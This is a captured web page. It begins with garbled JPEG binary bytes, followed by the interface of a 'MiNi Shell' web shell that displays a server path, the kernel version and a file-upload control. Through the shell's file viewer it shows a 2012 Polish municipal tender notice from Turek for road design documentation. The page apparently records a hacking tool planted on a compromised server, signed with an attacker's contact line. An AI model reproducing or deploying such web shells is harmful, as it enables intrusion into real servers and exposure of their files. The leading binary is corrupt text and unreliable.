JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120524/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120524/171356-N-2012.html

<p class="kh_header"><b>Turek: OPRACOWANIA DOKUMENTACJI PROJEKTOWEJ - BUDOWA ULICY FOLWARCZNEJ, OSIEDLE UNIEJOWSKIE I ZAPAŁCZANEJ</b><br>
<b>Numer ogłoszenia: 171356 - 2012; data zamieszczenia: 24.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Turku , ul. Kaliska 59, 62-700 Turek, woj. wielkopolskie, tel. 063 289 61 00, faks 063 289 61 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.miastoturek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIA DOKUMENTACJI PROJEKTOWEJ - BUDOWA ULICY FOLWARCZNEJ, OSIEDLE UNIEJOWSKIE I ZAPAŁCZANEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia publicznego obejmuje do wykonania następujący zakres rzeczowy:
1.  Zakres  opracowania
A.	Odcinek  A-G-H-B (ul. Folwarczna) - odcinek długości ok. 325 m
pkt A - Włączenie w istniejącą nawierzchnię ul. Folwarcznej - rejon skrzyżowania z ul. Różaną,
pkt B -  tzw. nawrotka w pasie drogi krajowej bez włączenia.
Pkt. G - włączenie odcinka CFG w ciąg ul. Folwarcznej - dopuszczalne włączenie tego ciągu w istniejącym rozwiązaniu..
B.	Odcinek E-F  (ul. Os. Uniejowskie) - odcinek  długości ok. 170 m
C.	Odcinek C-F-G odcinek o długości ok. 150 m
pkt. C - włączenie do drogi krajowej
D.	Odcinek H-I-J (przedłużenie ul. Wschodniej) odcinek  długości ok. 170 m
pkt. J - włączenie do ulicy Wschodniej
E.	Odcinek I-L-Ł (przedłużenie ul. Królowej Jadwigi) odcinek  długości ok. 185 m
F.	Odcinek K-L  odcinek  długości ok. 75 m
G.	Odcinek D-Ł (ul. Zapałczana) odcinek  długości ok. 100 m
pkt. D - włączenie do drogi krajowej
	Opracowanie powinno  zawierać:
1.	projekt kanalizacji deszczowej,
opracowanie drogowe - ciągi komunikacyjne (z kostki brukowej bezfazowej): jezdnia  kolor czerwony, chodniki - kolor żółty, ścieżka rowerowa - kolor zielony, zjazdy - kolor grafitowy, parkingi - kolor grafitowy (kolory dot. Oznaczeń w dokumentacji),
projekt oświetlenia ulicznego,
projekt stałej organizacji ruchu,
projekt zagospodarowania terenu - zieleń - mała architektura,
rozwiązania kolizji z istniejącą infrastrukturą techniczną,
projekt zjazdów do istniejących (zabudowanych) posesji,
projekt zjazdów  do nieruchomości wykazanych w MPZP,
kanały technologiczne - zaprojektowane pod warunkiem zgłoszenia zainteresowania użytkowaniem przez podmioty (zgodnie z art.39 pkt.6a ustawy o drogach publicznych (Dz.U.2007.19.115 ze zm.)) lub w przypadku braku zainteresowania (zgodnie z art.39 pkt.6 ust. 2) ustawy o drogach publicznych (Dz.U.2007.19.115 ze zm.) kanalizacja 3-otworowa z rur RHDPEp110/6,3 na potrzeby telewizji kablowej, monitoringu i telekomunikacji; po jednej stronie jezdni, z przejściami poprzecznymi,
plan wyrębu drzew,
Dokumentację  należy opracować dla każdego z etapów ( Ado H)  w następującym  zakresie:
a)	projekt budowlany (wszystkie branże)  - po 6 egz. dla każdego etapu,
b)	projekt wykonawczy (wszystkie branże ) - po 4 egz. dla każdego etapu, 
c)	przedmiary robót dla każdego etapu (wydzielone elementy: ciągi komunikacyjne, chodniki, ścieżki rowerowe, parkingi, zjazdy, kanalizacja deszczowa, oświetlenie uliczne, zieleń, organizacja ruchu, kolizje, kanały technologiczne lub kanalizacja 3-otworowa z rur RHDPEp110/6,3 na potrzeby telewizji kablowej, monitoringu i telekomunikacji, drenaż ) - po 2 egz.,
d)	kosztorys inwestorski dla każdego etapu- po 2 egz.,
e)	zbiorcze zestawienie kosztów - 1 egz.,
f)	dokumentacja geotechniczna pod budowę kanalizacji deszczowej i budowę dróg  z podaniem nośności podłoża,
g)	informację z rejestru gruntów potwierdzoną przez przedstawiciela Starosty Tureckiego (kserokopia wpięta do każdego z egz. projektu budowlanego),
h)	opinie, uzgodnienia, operaty, warunki, decyzje i projekty podziału nieruchomości w celu uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej lub decyzji o pozwoleniu na budowę,
i)	rozwiązania kolizji z istniejąca infrastrukturą w formie odrębnych opracowań (projektów) zgodnie z obowiązującymi przepisami, 
j)	projekt stałej organizacji ruchu z stosownymi uzgodnieniami - 4 egz.,
k)	specyfikacje techniczne wykonania i odbioru robót budowlanych - dla wszystkich branż (w tym rozwiązania kolizji) - 2 komplety,
l)	informacja dotycząca bezpieczeństwa i ochrony zdrowia - 4 egz. wpięte do każdego z egz. projektu budowlanego,
m)	koncepcja z podaniem rozwiązań: ciągów komunikacyjnych, chodników, ścieżek rowerowych, parkingów, zjazdów, kanalizacji deszczowej, oświetlenia ulicznego, zieleni, organizacji ruchu, kolizji, kanałów technologicznych lub kanalizacji 3-otworowej z rur RHDPEp110/6,3 na potrzeby telewizji kablowej, monitoringu i telekomunikacji, drenażu, na aktualnych mapach do celów projektowych - 1 egz.
Dokumentacja powinna być opracowana prócz formy papierowej w wersji elektronicznej w formacie ogólnodostępnym. Przedmiary robót w formacie arkusza kalkulacyjnego programu Excel.
2.	Dokumentacja i zakres do wykonania określony niniejszą umową winien zawierać: komplet uzgodnień, opinii, umów, operatów, opracowań, projektów,  raportów, decyzji oraz projektów podziału wymaganych do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej- zgodnie z obowiązującymi przepisami na dzień złożenia wniosku o uzyskanie decyzji o zezwoleniu na realizację inwestycji drogowej - ich koszt ponosi Wykonawca.
3.	Koszt map do celów projektowych i informacji z rejestru gruntów ponosi Wykonawca.
4.	Wykonawca wystąpi o wydanie warunków technicznych i uzgodnień.
5.	Wykonawca w imieniu Inwestora uzyska decyzję o zezwoleniu na realizację inwestycji drogowej (lub decyzję o pozwoleniu na budowę).
6.	W związku z tym, że dokumentacja zostanie wykorzystana do przeprowadzenia postępowania o udzielenie zamówienia zgodnie z ustawą z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych, powinna być wykonana ze szczególną starannością; cały zakres dokumentacji (łącznie z zagospodarowaniem terenu) winien mieć swe odzwierciedlenie  w przedmiarach robót. Przedmiary winny w sposób czytelny określać zakres prac do wykonania.
7.	Wykonawca w każdym egzemplarzu projektu budowlanego, przez które przebiegały będą projektowane drogi zaznaczy kolorem żółtym granice działki, nr działki podkreśli kolorem zielonym.
8.	Wykonawca w przedmiarach uwzględni roboty, które nie wymagają konieczności wykazania ich w projekcie budowlanym a są konieczne do wykonania.
9.	Jeżeli organ uzgadniający dokumentację zatrzymuje jeden lub więcej egzemplarzy dokumentacji - Wykonawca o taką ilość zwiększy ilość egzemplarzy opracowanej dokumentacji.
10.	Wykonawca w pierwszej kolejności przekaże Zamawiającemu 1 egz. map do celów projektowych, złożonych do formatu A4. Po ich przekazaniu może przystąpić do opracowania koncepcji dokumentacji projektowej - wszystkie branże wraz z przekrojami normalnymi. Po zatwierdzeniu przez Zamawiającego koncepcji wykonanej zgodnie z §2 ust.1 pkt m) Wykonawca może przystąpić do opracowywania całości zakresu niniejszej umowy.
11.	Wykonawca na etapie składania dokumentacji w celu uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej  udostępni ją do wglądu Zamawiającemu. Wniosek o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej oraz wniosek o uzyskania decyzji o pozwoleniu na budowę zaparafuje Zamawiający.
12.	Obowiązkiem Wykonawcy jest aby wybrany przez niego geodeta na mapach do celów projektowych liniami przerywanymi wkreślił wszystkie projektowane urządzenia infrastruktury technicznej i obiekty (nie wybudowane).
13.	Wykonawca dołączy dokumentację sporządzoną na nośniku w wersji cyfrowej w ogólnodostępnym i bezpłatnym programie, zabezpieczoną przed modyfikacją:
tekst - zamknięty format PDF, znajdujący się na stronie internetowej www.adobe.pl,
rysunki - przeglądarka plików formatu DWG i DGN znajdująca się na stronie internetowej www.bentley.com/pl-PL/ 
przedmiary robót zamknięty format PDF oraz w formacie arkusza kalkulacyjnego programu Excel
za wyjątkiem kosztorysu inwestorskiego i zbiorczego zestawienia kosztów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości  1 500,00 PLN (słownie złotych: jeden tysiąc pięćset)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonanie przynajmniej jednej dokumentacji drogowej o długości minimalnej 1 km w ramach ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych ( Dz. U. 2008 r. nr 193 poz. 1194 ze zm.),</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, to znaczy znajdujące się w dyspozycji wykonawcy osoby powinny posiadać uprawnienia do projektowania udzielone w specjalnościach :
drogowej;
lub uprawnienia budowlane udzielone w zakresie odpowiadającym zakresowi specjalności, o których mowa wyżej, uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub też kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych, w szczególności na podstawie ustawy z dnia 18 marca 2008 r. w o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	W sprawach nie uregulowanych niniejszą umową stosuje się przepisy Kodeksu Cywilnego, ustawy z dnia 7 lipca 1994 r. Prawo Budowlane i ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych.
2.	Wszelkie zmiany, w tym termin wykonania umowy, wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności w przypadkach wyszczególnionych w niniejszej umowie.
3.	Zmiana terminu wykonania umowy może nastąpić m.in. w następujących przypadkach:
w przypadku opóźnienia w uzyskaniu stosownych decyzji administracyjnych i uzgodnień z przyczyn niezależnych od Wykonawcy,
zmian dokumentacji projektowej,
wystąpienia innych robót do projektowania nie przewidzianych przedmiotową umową, mogących mieć wpływ na pierwotny czas wykonywania przedmiotu umowy realizowanych przez Wykonawcę lub inny podmiot,
działań osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji zamówienia,z powodu szczególnie niesprzyjających warunków atmosferycznych,
z powodu siły wyższej.
4.	Wszelkie spory mogące wynikać w związku z realizacją niniejszej umowy będą rozstrzygane przez sąd właściwy dla siedziby Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miastoturek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Turku ul. Kaliska 59, 62-700 Turek - Biuro Zamówień publicznych i zakupów pok 110.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2012 godzina 11:00, miejsce: Urząd Miejski w Turku ul. Kaliska 59, 62-700 Turek - Biuro Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com